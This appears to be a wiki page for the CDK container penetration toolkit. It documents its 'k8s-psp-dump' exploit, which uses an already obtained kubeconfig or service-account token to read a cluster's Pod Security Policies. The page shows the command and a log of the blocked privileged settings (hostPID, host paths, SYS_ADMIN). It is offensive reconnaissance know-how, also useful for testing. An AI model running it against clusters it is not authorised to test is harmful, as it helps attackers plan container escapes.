-
Notifications
You must be signed in to change notification settings - Fork 554
Exploit: k8s psp dump
neargle edited this page Mar 24, 2021
·
1 revision
对于已经获取了kubeconfig或sa账号权限,进而想要创建特殊配置的容器,但是受到了K8s Pod Security Policies的限制时;可以使用这个Exploit获取Pod Security Policies的规则信息。
For those who have got kubeconfig or sa account permissions and want to create a specially configured container, but are restricted by K8s Pod Security Policies; you can use this exploit to obtain Pod Security Policies rule information.
./cdk run k8s-psp-dump (auto|<service-account-token-path>
./cdk run k8s-psp-dump auto
2021/03/24 22:15:58 getting K8s api-server API addr.
Find K8s api-server in ENV: https://ip:8443
2021/03/24 22:15:58 trying to dump K8s Pod Security Policies with local service-account: token
2021/03/24 22:15:58 requesting /apis/policy/v1beta1/podsecuritypolicies
2021/03/24 22:15:58 dump Pod Security Policies success, saved in: k8s_pod_security_policies.json
2021/03/24 22:15:58 requesting /api/v1/namespaces/default/pods
2021/03/24 22:15:58 K8S Pod Security Policies rule list:
2021/03/24 22:15:58 rule { securityContext.hostPID: true } is not allowed.
2021/03/24 22:15:58 rule { securityContext.hostIPC: true } is not allowed.
2021/03/24 22:15:58 rule { volumes[0].hostPath.pathPrefix: \"/proc\" } is not allowed.
2021/03/24 22:15:58 rule { volumes[1].hostPath.pathPrefix: \"/dev\" } is not allowed.
2021/03/24 22:15:58 rule { volumes[2].hostPath.pathPrefix: \"/sys\" } is not allowed.
2021/03/24 22:15:58 rule { volumes[3].hostPath.pathPrefix: \"/\" } is not allowed.
2021/03/24 22:15:58 rule { containers[0].securityContext.capabilities.add: \"SYS_ADMIN\" } is not allowed.
2021/03/24 22:15:58 rule { containers[0].securityContext.capabilities.add: \"SYS_PTRACE\" } is not allowed.